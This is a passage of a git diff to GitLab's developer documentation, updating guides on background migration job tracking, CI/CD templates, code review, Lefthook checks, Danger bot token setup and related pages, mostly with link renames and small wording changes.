b/doc/development/background_migrations.md @@ -7,9 +7,9 @@ info: "See the Technical Writers assigned to Development Guidelines: https://abo # Background migrations -Background migrations should be used to perform data migrations whenever a -migration exceeds [the time limits in our guidelines](database_review.md#timing-guidelines-for-migrations). For example, you can use background -migrations to migrate data that's stored in a single JSON column +Background migrations should be used to perform data migrations whenever a +migration exceeds [the time limits in our guidelines](database_review.md#timing-guidelines-for-migrations). For example, you can use background +migrations to migrate data that's stored in a single JSON column to a separate table instead. If the database cluster is considered to be in an unhealthy state, background @@ -17,7 +17,7 @@ migrations automatically reschedule themselves for a later point in time. ## When To Use Background Migrations -You should use a background migration when you migrate _data_ in tables that have +You should use a background migration when you migrate _data_ in tables that have so many rows that the process would exceed [the time limits in our guidelines](database_review.md#timing-guidelines-for-migrations) if performed using a regular Rails migration. - Background migrations should be used when migrating data in [high-traffic tables](migration_style_guide.md#high-traffic-tables). @@ -429,3 +429,80 @@ should fit comfortably within the delay time for a few reasons: Never try to optimize by fully filling the delay window even if you are confident the queries themselves have no timing variance. + +### Background jobs tracking + +`queue_background_migration_jobs_by_range_at_intervals` can create records for each job that is scheduled to run. +You can enable this behavior by passing `track_jobs: true`. Each record starts with a `pending` status. Make sure that your worker updates the job status to `succeeded` by calling `Gitlab::Database::BackgroundMigrationJob.mark_all_as_succeeded` in the `perform` method of your background migration. + +```ruby +# Background migration code + +def perform(start_id, end_id) + # do work here + + mark_job_as_succeeded(start_id, end_id) +end + +private + +# Make sure that the arguments passed here match those passed to the background +# migration +def mark_job_as_succeeded(*arguments) + Gitlab::Database::BackgroundMigrationJob.mark_all_as_succeeded( + self.class.name.demodulize, + arguments + ) +end +``` + +```ruby +# Post deployment migration +include Gitlab::Database::MigrationHelpers + +MIGRATION = 'YourBackgroundMigrationName' +DELAY_INTERVAL = 2.minutes.to_i # can be different +BATCH_SIZE = 10_000 # can be different + +disable_ddl_transaction! + +def up + queue_background_migration_jobs_by_range_at_intervals( + define_batchable_model('name_of_the_table_backing_the_model'), + MIGRATION, + DELAY_INTERVAL, + batch_size: BATCH_SIZE, + track_jobs: true + ) +end + +def down + # no-op +end +``` + +See [`lib/gitlab/background_migration/drop_invalid_vulnerabilities.rb`](https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/background_migration/drop_invalid_vulnerabilities.rb) for a full example. + +#### Rescheduling pending jobs + +You can reschedule pending migrations from the `background_migration_jobs` table by creating a post-deployment migration and calling `requeue_background_migration_jobs_by_range_at_intervals` with the migration name and delay interval. + +```ruby +# Post deployment migration +include Gitlab::Database::MigrationHelpers + +MIGRATION = 'YourBackgroundMigrationName' +DELAY_INTERVAL = 2.minutes + +disable_ddl_transaction! + +def up + requeue_background_migration_jobs_by_range_at_intervals(MIGRATION, DELAY_INTERVAL) +end + +def down + # no-op +end +``` + +See [`db/post_migrate/20210604070207_retry_backfill_traversal_ids.rb`](https://gitlab.com/gitlab-org/gitlab/blob/master/db/post_migrate/20210604070207_retry_backfill_traversal_ids.rb) for a full example. diff --git a/doc/development/bulk_import.md b/doc/development/bulk_import.md index e70880635e6..ff0c8a19ca1 100644 --- a/doc/development/bulk_import.md +++ b/doc/development/bulk_import.md @@ -40,9 +40,9 @@ idea is to have one ETL pipeline for each relation to be imported. The current [Project](../user/project/settings/import_export.md) and [Group](../user/group/settings/import_export.md) Import are file based, so they require an export step to generate the file to be imported. -GitLab Group migration leverages on [GitLab API](../api/README.md) to speed the migration. +GitLab Group migration leverages on [GitLab API](../api/index.md) to speed the migration. -And, because we're on the road to [GraphQL](../api/README.md#graphql-api), +And, because we're on the road to [GraphQL](../api/index.md#graphql-api), GitLab Group Migration will be contributing towards to expand the GraphQL API coverage, which benefits both GitLab and its users. diff --git a/doc/development/cascading_settings.md b/doc/development/cascading_settings.md index 631de544238..d1c5756fa2c 100644 --- a/doc/development/cascading_settings.md +++ b/doc/development/cascading_settings.md @@ -82,7 +82,7 @@ cascading_attr :delayed_project_removal - `delayed_project_removal_locked_by_ancestor?` - `delayed_project_removal_locked_by_application_setting?` - `delayed_project_removal?` (Boolean attributes only) -- `delayed_project_removal_locked_ancestor` (Returns locked namespace settings object [namespace_id]) +- `delayed_project_removal_locked_ancestor` (Returns locked namespace settings object `[namespace_id]`) ### Attribute reader method (`delayed_project_removal`) @@ -112,9 +112,9 @@ There are a few Rails view helpers, HAML partials, and JavaScript functions that ### Rails view helpers -[`cascading_namespace_setting_locked?`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/helpers/namespaces_helper.rb#L86) +[`cascading_namespace_setting_locked?`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/helpers/namespaces_helper.rb#L86) -Calls through to the [`_locked?` method](#_locked-method) to check if the setting is locked. +Calls through to the [`_locked?` method](#_locked-method) to check if the setting is locked. | Argument | Description | Type | Required (default value) | |:------------|:---------------------------------------------------------------------------------|:----------------------------------------------------------------------------------|:-------------------------| @@ -124,47 +124,50 @@ Calls through to the [`_locked?` method](#_locked-method) to check if the settin ### HAML partials -[`_enforcement_checkbox.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_enforcement_checkbox.html.haml) +[`_enforcement_checkbox.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_enforcement_checkbox.html.haml) -Renders the enforcement checkbox. +Renders the enforcement checkbox. | Local | Description | Type | Required (default value) | |:-----------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------|:------------------------------------------------| | `attribute` | Name of the setting. For example, `:delayed_project_removal`. | `String` or `Symbol` | `true` | +| `group` | Current group. | [`Group`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/group.rb) | `true` | | `form` | [Rails FormBuilder object](https://apidock.com/rails/ActionView/Helpers/FormBuilder). | [`ActionView::Helpers::FormBuilder`](https://apidock.com/rails/ActionView/Helpers/FormBuilder) | `true` | | `setting_locked` | If the setting is locked by an ancestor group or admin setting. Can be calculated with [`cascading_namespace_setting_locked?`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/helpers/namespaces_helper.rb#L86). | `Boolean` | `true` | | `help_text` | Text shown below the checkbox. | `String` | `false` (Subgroups cannot change this setting.) | -[`_setting_label_checkbox.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_setting_label_checkbox.html.haml) +[`_setting_label_checkbox.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_setting_label_checkbox.html.haml) -Renders the label for a checkbox setting. +Renders the label for a checkbox setting. | Local | Description | Type | Required (default value) | |:-----------------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------|:-------------------------| | `attribute` | Name of the setting. For example, `:delayed_project_removal`. | `String` or `Symbol` | `true` | +| `group` | Current group. | [`Group`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/group.rb) | `true` | | `form` | [Rails FormBuilder object](https://apidock.com/rails/ActionView/Helpers/FormBuilder). | [`ActionView::Helpers::FormBuilder`](https://apidock.com/rails/ActionView/Helpers/FormBuilder) | `true` | | `setting_locked` | If the setting is locked by an ancestor group or admin setting. Can be calculated with [`cascading_namespace_setting_locked?`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/helpers/namespaces_helper.rb#L86). | `Boolean` | `true` | | `settings_path_helper` | Lambda function that generates a path to the ancestor setting. For example, `settings_path_helper: -> (locked_ancestor) { edit_group_path(locked_ancestor, anchor: 'js-permissions-settings') }` | `Lambda` | `true` | | `help_text` | Text shown below the checkbox. | `String` | `false` (`nil`) | -[`_setting_label_fieldset.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_setting_label_fieldset.html.haml) +[`_setting_label_fieldset.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/views/shared/namespaces/cascading_settings/_setting_label_fieldset.html.haml) -Renders the label for a fieldset setting. +Renders the label for a fieldset setting. | Local | Description | Type | Required (default value) | |:-----------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------|:-------------------------| | `attribute` | Name of the setting. For example, `:delayed_project_removal`. | `String` or `Symbol` | `true` | +| `group` | Current group. | [`Group`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/group.rb) | `true` | | `setting_locked` | If the setting is locked. Can be calculated with [`cascading_namespace_setting_locked?`](https://gitlab.com/gitlab-org/gitlab/-/blob/c2736823b8e922e26fd35df4f0cd77019243c858/app/helpers/namespaces_helper.rb#L86). | `Boolean` | `true` | | `settings_path_helper` | Lambda function that generates a path to the ancestor setting. For example, `-> (locked_ancestor) { edit_group_path(locked_ancestor, anchor: 'js-permissions-settings') }` | `Lambda` | `true` | | `help_text` | Text shown below the checkbox. | `String` | `false` (`nil`) | -[`_lock_popovers.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/b73353e47e283a7d9c9eda5bdedb345dcfb685b6/app/views/shared/namespaces/cascading_settings/_lock_popovers.html.haml) +[`_lock_popovers.html.haml`](https://gitlab.com/gitlab-org/gitlab/-/blob/b73353e47e283a7d9c9eda5bdedb345dcfb685b6/app/views/shared/namespaces/cascading_settings/_lock_popovers.html.haml) -Renders the mount element needed to initialize the JavaScript used to display the popover when hovering over the lock icon. This partial is only needed once per page. +Renders the mount element needed to initialize the JavaScript used to display the popover when hovering over the lock icon. This partial is only needed once per page. ### JavaScript -[`initCascadingSettingsLockPopovers`](https://gitlab.com/gitlab-org/gitlab/-/blob/b73353e47e283a7d9c9eda5bdedb345dcfb685b6/app/assets/javascripts/namespaces/cascading_settings/index.js#L4) +[`initCascadingSettingsLockPopovers`](https://gitlab.com/gitlab-org/gitlab/-/blob/b73353e47e283a7d9c9eda5bdedb345dcfb685b6/app/assets/javascripts/namespaces/cascading_settings/index.js#L4) Initializes the JavaScript needed to display the popover when hovering over the lock icon (**{lock}**). This function should be imported and called in the [page-specific JavaScript](fe_guide/performance.md#page-specific-javascript). diff --git a/doc/development/changelog.md b/doc/development/changelog.md index f0c37af42ab..c96fe2c18c1 100644 --- a/doc/development/changelog.md +++ b/doc/development/changelog.md @@ -81,7 +81,7 @@ EE: true - Any change that introduces a database migration, whether it's regular, post, or data migration, **must** have a changelog entry, even if it is behind a - disabled feature flag. + disabled feature flag. - [Security fixes](https://gitlab.com/gitlab-org/release/docs/blob/master/general/security/developer.md) **must** have a changelog entry, with `Changelog` trailer set to `security`. - Any user-facing change **must** have a changelog entry. Example: "GitLab now @@ -98,6 +98,7 @@ EE: true database records created during Cycle Analytics model spec." - _Any_ contribution from a community member, no matter how small, **may** have a changelog entry regardless of these guidelines if the contributor wants one. +- [Removing](feature_flags/#changelog) a feature flag, when the new code is retained. ## Writing good changelog entries @@ -188,4 +189,4 @@ documentation](https://git-scm.com/book/en/v2/Git-Tools-Rewriting-History). --- -[Return to Development documentation](README.md) +[Return to Development documentation](index.md) diff --git a/doc/development/chatops_on_gitlabcom.md b/doc/development/chatops_on_gitlabcom.md index 4ae49103d1b..26fcf520393 100644 --- a/doc/development/chatops_on_gitlabcom.md +++ b/doc/development/chatops_on_gitlabcom.md @@ -28,7 +28,7 @@ To request access to ChatOps on GitLab.com: 1. Confirm that your username in [Internal GitLab for Operations](https://ops.gitlab.net/) is the same as your username in [GitLab.com](https://gitlab.com/). If the usernames - don't match, update the username at [Internal GitLab for Operations](https://ops.gitlab.net/). + don't match, update the username in [User Settings/Account for the Ops instance](https://ops.gitlab.net/-/profile/account). 1. Comment in your onboarding issue, and tag your onboarding buddy and your manager. Request they add you to the `ops` ChatOps project by running this command diff --git a/doc/development/cicd/cicd_reference_documentation_guide.md b/doc/development/cicd/cicd_reference_documentation_guide.md index 14a313daba8..33bc416d8bc 100644 --- a/doc/development/cicd/cicd_reference_documentation_guide.md +++ b/doc/development/cicd/cicd_reference_documentation_guide.md @@ -4,7 +4,7 @@ group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# CI/CD YAML reference style guide +# CI/CD YAML reference style guide **(FREE)** The CI/CD YAML reference uses a standard style to make it easier to use and update. @@ -91,7 +91,7 @@ Keyword description and main details. ### YAML reference style example -See the [`only:changes` / `except:changes`](../../ci/yaml/README.md#onlychanges--exceptchanges) +See the [`only:changes` / `except:changes`](../../ci/yaml/index.md#onlychanges--exceptchanges) documentation for an example of the YAML reference style. The following example is a shortened version of that documentation's Markdown: diff --git a/doc/development/cicd/index.md b/doc/development/cicd/index.md index 025d63f4a62..6d4e19d8196 100644 --- a/doc/development/cicd/index.md +++ b/doc/development/cicd/index.md @@ -5,14 +5,14 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: index, concepts, howto --- -# CI/CD development documentation +# CI/CD development documentation **(FREE)** Development guides that are specific to CI/CD are listed here. If you are creating new CI/CD templates, please read [the development guide for GitLab CI/CD templates](templates.md). See the [CI/CD YAML reference documentation guide](cicd_reference_documentation_guide.md) -to learn how to update the [reference page](../../ci/yaml/README.md). +to learn how to update the [reference page](../../ci/yaml/index.md). ## CI Architecture overview @@ -27,13 +27,13 @@ On the left side we have the events that can trigger a pipeline based on various - A `git push` is the most common event that triggers a pipeline. - The [Web API](../../api/pipelines.md#create-a-new-pipeline). - A user clicking the "Run pipeline" button in the UI. -- When a [merge request is created or updated](../../ci/merge_request_pipelines/index.md#pipelines-for-merge-requests). -- When an MR is added to a [Merge Train](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md#merge-trains). +- When a [merge request is created or updated](../../ci/pipelines/merge_request_pipelines.md#pipelines-for-merge-requests). +- When an MR is added to a [Merge Train](../../ci/pipelines/merge_trains.md#merge-trains). - A [scheduled pipeline](../../ci/pipelines/schedules.md#pipeline-schedules). -- When project is [subscribed to an upstream project](../../ci/multi_project_pipelines.md#trigger-a-pipeline-when-an-upstream-project-is-rebuilt). +- When project is [subscribed to an upstream project](../../ci/pipelines/multi_project_pipelines.md#trigger-a-pipeline-when-an-upstream-project-is-rebuilt). - When [Auto DevOps](../../topics/autodevops/index.md) is enabled. - When GitHub integration is used with [external pull requests](../../ci/ci_cd_for_external_repos/index.md#pipelines-for-external-pull-requests). -- When an upstream pipeline contains a [bridge job](../../ci/yaml/README.md#trigger) which triggers a downstream pipeline. +- When an upstream pipeline contains a [bridge job](../../ci/yaml/index.md#trigger) which triggers a downstream pipeline. Triggering any of these events invokes the [`CreatePipelineService`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/ci/create_pipeline_service.rb) which takes as input event data and the user triggering it, then attempts to create a pipeline. @@ -42,7 +42,7 @@ The `CreatePipelineService` relies heavily on the [`YAML Processor`](https://git component, which is responsible for taking in a YAML blob as input and returns the abstract data structure of a pipeline (including stages and all jobs). This component also validates the structure of the YAML while processing it, and returns any syntax or semantic errors. The `YAML Processor` component is where we define -[all the keywords](../../ci/yaml/README.md) available to structure a pipeline. +[all the keywords](../../ci/yaml/index.md) available to structure a pipeline. The `CreatePipelineService` receives the abstract data structure returned by the `YAML Processor`, which then converts it to persisted models (pipeline, stages, jobs, etc.). After that, the pipeline is ready @@ -61,7 +61,7 @@ successfully or fail. Each status transition for job within a pipeline triggers looks for the next jobs to be transitioned towards completion. While doing that, `ProcessPipelineService` updates the status of jobs, stages and the overall pipeline. -On the right side of the diagram we have a list of [runners](../../ci/runners/README.md) +On the right side of the diagram we have a list of [runners](../../ci/runners/index.md) connected to the GitLab instance. These can be shared runners, group runners, or project-specific runners. The communication between runners and the Rails server occurs through a set of API endpoints, grouped as the `Runner API Gateway`. @@ -79,12 +79,12 @@ case the runner downloads them using a dedicated API endpoint. Artifacts are stored in object storage, while metadata is kept in the database. An important example of artifacts are reports (JUnit, SAST, DAST, etc.) which are parsed and rendered in the merge request. -Job status transitions are not all automated. A user may run [manual jobs](../../ci/yaml/README.md#whenmanual), cancel a pipeline, retry +Job status transitions are not all automated. A user may run [manual jobs](../../ci/yaml/index.md#whenmanual), cancel a pipeline, retry specific failed jobs or the entire pipeline. Anything that causes a job to change status triggers `ProcessPipelineService`, as it's responsible for tracking the status of the entire pipeline. -A special type of job is the [bridge job](../../ci/yaml/README.md#trigger) which is executed server-side +A special type of job is the [bridge job](../../ci/yaml/index.md#trigger) which is executed server-side when transitioning to the `pending` state. This job is responsible for creating a downstream pipeline, such as a multi-project or child pipeline. The workflow loop starts again from the `CreatePipelineService` every time a downstream pipeline is triggered. diff --git a/doc/development/cicd/templates.md b/doc/development/cicd/templates.md index 8331985697e..204287d7b59 100644 --- a/doc/development/cicd/templates.md +++ b/doc/development/cicd/templates.md @@ -7,7 +7,7 @@ type: index, concepts, howto # Development guide for GitLab CI/CD templates -This document explains how to develop [GitLab CI/CD templates](../../ci/examples/README.md). +This document explains how to develop [GitLab CI/CD templates](../../ci/examples/index.md). ## Requirements for CI/CD templates @@ -16,7 +16,7 @@ Before submitting a merge request with a new or updated CI/CD template, you must - Place the template in the correct [directory](#template-directories). - Follow the [CI/CD template authoring guidelines](#template-authoring-guidelines). - Name the template following the `*.gitlab-ci.yml` format. -- Use valid [`.gitlab-ci.yml` syntax](../../ci/yaml/README.md). Verify it's valid +- Use valid [`.gitlab-ci.yml` syntax](../../ci/yaml/index.md). Verify it's valid with the [CI/CD lint tool](../../ci/lint.md). - Include [a changelog](../changelog.md) if the merge request introduces a user-facing change. - Follow the [template review process](#contribute-cicd-template-merge-requests). @@ -59,8 +59,8 @@ don't have any other `.gitlab-ci.yml` files. When authoring pipeline templates: -- Place any [global keywords](../../ci/yaml/README.md#global-keywords) like `image` - or `before_script` in a [`default`](../../ci/yaml/README.md#custom-default-keyword-values) +- Place any [global keywords](../../ci/yaml/index.md#global-keywords) like `image` + or `before_script` in a [`default`](../../ci/yaml/index.md#custom-default-keyword-values) section at the top of the template. - Note clearly in the [code comments](#explain-the-template-with-comments) if the template is designed to be used with the `includes` keyword in an existing @@ -68,7 +68,7 @@ When authoring pipeline templates: A **job template** provides specific jobs that can be added to an existing CI/CD workflow to accomplish specific tasks. It usually should be used by adding it to -an existing `.gitlab-ci.yml` file by using the [`includes`](../../ci/yaml/README.md#global-keywords) +an existing `.gitlab-ci.yml` file by using the [`includes`](../../ci/yaml/index.md#global-keywords) keyword. You can also copy and paste the contents into an existing `.gitlab-ci.yml` file. Configure job templates so that users can add them to their current pipeline with very @@ -77,7 +77,7 @@ other pipeline configuration. When authoring job templates: -- Do not use [global](../../ci/yaml/README.md#global-keywords) or [`default`](../../ci/yaml/README.md#custom-default-keyword-values) +- Do not use [global](../../ci/yaml/index.md#global-keywords) or [`default`](../../ci/yaml/index.md#custom-default-keyword-values) keywords. When a root `.gitlab-ci.yml` includes a template, global or default keywords might be overridden and cause unexpected behavior. If a job template requires a specific stage, explain in the code comments that users must manually add the stage @@ -127,8 +127,8 @@ job2: #### Use `rules` instead of `only` or `except` -Avoid using [`only` or `except`](../../ci/yaml/README.md#only--except) if possible. -Only and except is not being developed any more, and [`rules`](../../ci/yaml/README.md#rules) +Avoid using [`only` or `except`](../../ci/yaml/index.md#only--except) if possible. +Only and except is not being developed any more, and [`rules`](../../ci/yaml/index.md#rules) is now the preferred syntax: ```yaml diff --git a/doc/development/code_review.md b/doc/development/code_review.md index df09b27c6b4..929e75e7774 100644 --- a/doc/development/code_review.md +++ b/doc/development/code_review.md @@ -74,6 +74,7 @@ page, with these behaviors: 1. It doesn't pick people whose Slack or [GitLab status](../user/profile/index.md#set-your-current-status): - contains the string 'OOO', 'PTO', 'Parental Leave', or 'Friends and Family' - emoji is `:palm_tree:`, `:beach:`, `:beach_umbrella:`, `:beach_with_umbrella:`, `:ferris_wheel:`, `:thermometer:`, `:face_with_thermometer:`, `:red_circle:`, `:bulb:`, `:sun_with_face:`. + - GitLab user busy indicator is set to true 1. [Trainee maintainers](https://about.gitlab.com/handbook/engineering/workflow/code-review/#trainee-maintainer) are three times as likely to be picked as other reviewers. 1. Team members whose Slack or [GitLab status](../user/profile/index.md#set-your-current-status) emoji @@ -383,7 +384,7 @@ Before taking the decision to merge: - Set the milestone. - Consider warnings and errors from danger bot, code quality, and other reports. Unless a strong case can be made for the violation, these should be resolved - before merging. A comment must to be posted if the MR is merged with any failed job. + before merging. A comment must be posted if the MR is merged with any failed job. - If the MR contains both Quality and non-Quality-related changes, the MR should be merged by the relevant maintainer for user-facing changes (backend, frontend, or database) after the Quality related changes are approved by a Software Engineer in Test. If a merge request is fundamentally ready, but needs only trivial fixes (such as @@ -422,7 +423,7 @@ WARNING: do not merge the merge request** except for [very specific cases](https://about.gitlab.com/handbook/engineering/workflow/#criteria-for-merging-during-broken-master). For other cases, follow these [handbook instructions](https://about.gitlab.com/handbook/engineering/workflow/#merging-during-broken-master). - - If the **latest [Pipeline for Merged Results](../ci/merge_request_pipelines/pipelines_for_merged_results/#pipelines-for-merged-results)** finished less than 2 hours ago, you + - If the **latest [Pipeline for Merged Results](../ci/pipelines/pipelines_for_merged_results.md)** finished less than 2 hours ago, you might merge without starting a new pipeline as the merge request is close enough to `main`. - When you set the MR to "Merge When Pipeline Succeeds", you should take over @@ -444,7 +445,7 @@ Merge Results against the latest `main` at the time of the pipeline creation. WARNING: **Review all changes thoroughly for malicious code before starting a -[Pipeline for Merged Results](../ci/merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project).** +[Pipeline for Merged Results](../ci/pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project).** When reviewing merge requests added by wider community contributors: @@ -604,7 +605,7 @@ A merge request may benefit from being considered a customer critical priority b Properties of customer critical merge requests: -- The [Senior Director of Development](https://about.gitlab.com/job-families/engineering/engineering-management/#senior-director-engineering) ([@clefelhocz1](https://gitlab.com/clefelhocz1)) is the DRI for deciding if a merge request is customer critical. +- The [VP of Development](https://about.gitlab.com/job-families/engineering/development/management/vp) ([@clefelhocz1](https://gitlab.com/clefelhocz1)) is the DRI for deciding if a merge request qualifies as customer critical. - The DRI applies the `customer-critical-merge-request` label to the merge request. - It is required that the reviewer(s) and maintainer(s) involved with a customer critical merge request are engaged as soon as this decision is made. - It is required to prioritize work for those involved on a customer critical merge request so that they have the time available necessary to focus on it. @@ -644,4 +645,4 @@ Largely based on the [`thoughtbot` code review guide](https://github.com/thought --- -[Return to Development documentation](README.md) +[Return to Development documentation](index.md) diff --git a/doc/development/contributing/issue_workflow.md b/doc/development/contributing/issue_workflow.md index 840434ebbc3..aa1b353c634 100644 --- a/doc/development/contributing/issue_workflow.md +++ b/doc/development/contributing/issue_workflow.md @@ -36,7 +36,7 @@ the affected files to find someone. We also use [GitLab Triage](https://gitlab.com/gitlab-org/gitlab-triage) to automate some triaging policies. This is currently set up as a scheduled pipeline (`https://gitlab.com/gitlab-org/quality/triage-ops/pipeline_schedules/10512/editpipeline_schedules/10512/edit`, -must have at least Developer access to the project) running on [quality/triage-ops](https://gitlab.com/gitlab-org/quality/triage-ops) +must have at least the Developer role in the project) running on [quality/triage-ops](https://gitlab.com/gitlab-org/quality/triage-ops) project. ## Labels @@ -149,7 +149,7 @@ and `~"group::knowledge"` is picked up by someone in the Access group of the Pla the issue should be relabeled as `~"group::access"` while keeping the original `~"devops::create"` unchanged. -We also use stage and group labels to help measure our [merge request rates](https://about.gitlab.com/handbook/engineering/merge-request-rate/). +We also use stage and group labels to help measure our [merge request rates](https://about.gitlab.com/handbook/engineering/metrics/#merge-request-rate). Please read [Stage and Group labels](https://about.gitlab.com/handbook/engineering/metrics/#stage-and-group-labels) for more information on how the labels are used in this context. ### Category labels diff --git a/doc/development/contributing/merge_request_workflow.md b/doc/development/contributing/merge_request_workflow.md index 783cf7af6fc..a6dcac47910 100644 --- a/doc/development/contributing/merge_request_workflow.md +++ b/doc/development/contributing/merge_request_workflow.md @@ -31,7 +31,7 @@ If you are new to GitLab development (or web development in general), see the some potentially easy issues. To start developing GitLab, download the [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) -and see the [Development section](../../README.md) for the required guidelines. +and see the [Development section](../../index.md) for the required guidelines. ## Merge request guidelines @@ -158,8 +158,8 @@ Commit messages should follow the guidelines below, for reasons explained by Chr Example commit message template that can be used on your machine that embodies the above (guide for [how to apply template](https://codeinthehole.com/tips/a-useful-template-for-commit-messages/)): ```plaintext -# (If applied, this commit will...) <subject> (Max 50 char) -# |<---- Using a Maximum Of 50 Characters ---->| +# (If applied, this commit will...) <subject> (Max 72 characters) +# |<---- Using a Maximum Of 72 Characters ---->| # Explain why this change is being made diff --git a/doc/development/contributing/style_guides.md b/doc/development/contributing/style_guides.md index 20e47b501e6..5a54e3afbea 100644 --- a/doc/development/contributing/style_guides.md +++ b/doc/development/contributing/style_guides.md @@ -91,8 +91,32 @@ To skip some checks based on tags when pushing, you can set the `LEFTHOOK_EXCLUD LEFTHOOK_EXCLUDE=frontend,documentation git push ... ``` +As an alternative, you can create `lefthook-local.yml` with this structure: + +```yaml +pre-push: + exclude_tags: + - frontend + - documentation +``` + For more information, check out [Lefthook documentation](https://github.com/Arkweid/lefthook/blob/master/docs/full_guide.md#skip-some-tags-on-the-fly). +### Skip or enable a specific Lefthook check + +To skip or enable a check based on its name when pushing, you can add `skip: true` +or `skip: false` to the `lefthook-local.yml` section for that hook. For instance, +you might want to enable the gettext check to detect issues with `locale/gitlab.pot`: + +```yaml +pre-push: + commands: + gettext: + skip: false +``` + +For more information, check out [Lefthook documentation Skipping commands section](https://github.com/evilmartians/lefthook/blob/master/docs/full_guide.md#skipping-commands). + ## Ruby, Rails, RSpec Our codebase style is defined and enforced by [RuboCop](https://github.com/rubocop-hq/rubocop). @@ -128,8 +152,12 @@ reduces the aforementioned [bike-shedding](https://en.wiktionary.org/wiki/bikesh To that end, we encourage creation of new RuboCop rules in the codebase. +We currently maintain Cops across several Ruby code bases, and not all of them are +specific to the GitLab application. When creating a new cop that could be applied to multiple applications, we encourage you to add it to our [GitLab Styles](https://gitlab.com/gitlab-org/gitlab-styles) gem. +If the Cop targets rules that only apply to the main GitLab application, +it should be added to [GitLab](https://gitlab.com/gitlab-org/gitlab) instead. ### Resolving RuboCop exceptions diff --git a/doc/development/dangerbot.md b/doc/development/dangerbot.md index 68268027b73..8f5788785f0 100644 --- a/doc/development/dangerbot.md +++ b/doc/development/dangerbot.md @@ -58,7 +58,7 @@ itself, increasing visibility. ## Development guidelines -Danger code is Ruby code, so all our [usual backend guidelines](README.md#backend-guides) +Danger code is Ruby code, so all our [usual backend guidelines](index.md#backend-guides) continue to apply. However, there are a few things that deserve special emphasis. ### When to use Danger @@ -119,13 +119,12 @@ However, you can speed these cycles up somewhat by emptying the to revert the change before merging! To enable the Dangerfile on another existing GitLab project, run the following -extra steps, based on [this procedure](https://danger.systems/guides/getting_started.html#creating-a-bot-account-for-danger-to-use): +extra steps: -1. Add `@gitlab-bot` to the project as a `reporter`. -1. Add the `@gitlab-bot`'s `GITLAB_API_PRIVATE_TOKEN` value as a value for a new CI/CD - variable named `DANGER_GITLAB_API_TOKEN`. +1. Create a [Project access tokens](../user/project/settings/project_access_tokens.md). +1. Add the token as a CI/CD project variable named `DANGER_GITLAB_API_TOKEN`. -You should add the `~Danger bot` label to the merge request before sending it +You should add the ~"Danger bot" label to the merge request before sending it for review. ## Current uses @@ -153,10 +152,11 @@ at GitLab so far: Danger is run but its output is not added to a merge request comment if working on a fork. This happens because the secret variable from the canonical project is not shared to forks. To work around this, you can add an [environment -variable](../ci/variables/README.md) called `DANGER_GITLAB_API_TOKEN` with a -personal API token to your fork. That way the danger comments are made from CI -using that API token instead. Making the variable -[masked](../ci/variables/README.md#mask-a-cicd-variable) makes sure it +variable](../ci/variables/index.md) called `DANGER_GITLAB_API_TOKEN` with a +[personal API token](https://gitlab.com/-/profile/personal_access_tokens?name=GitLab+Dangerbot&scopes=api) +to your fork that has the `api` scope set. That way the danger comments are made +from CI using that API token instead. Making the variable +[masked](../ci/variables/index.md#mask-a-cicd-variable) makes sure it doesn't show up in the job logs. The variable cannot be -[protected](../ci/variables/README.md#protect-a-cicd-variable), as it needs +[protected](../ci/variables/index.md#protect-a-cicd-variable), as it needs to be present for all feature branches. diff --git a/doc/development/database/database_reviewer_guidelines.md b/doc/development/database/database_reviewer_guidelines.md index 16734dada13..7a9c08d9d49 100644 --- a/doc/development/database/database_reviewer_guidelines.md +++ b/doc/development/database/database_reviewer_guidelines.md @@ -62,6 +62,9 @@ The following guides provide a quick introduction and links to follow on more ad - Guide on [understanding EXPLAIN plans](../understanding_explain_plans.md). - [Explaining the unexplainable series in `depesz`](https://www.depesz.com/tag/unexplainable/). +We also have licensed access to The Art of PostgreSQL available, if you are interested in getting access please check out the +[issue (confidential)](https://gitlab.com/gitlab-org/database-team/team-tasks/-/issues/23). + Finally, you can find various guides in the [Database guides](index.md) page that cover more specific topics and use cases. The most frequently required during database reviewing are the following: diff --git a/doc/development/database/multiple_databases.md b/doc/development/database/multiple_databases.md new file mode 100644 index 00000000000..2895cef86fc --- /dev/null +++ b/doc/development/database/multiple_databases.md 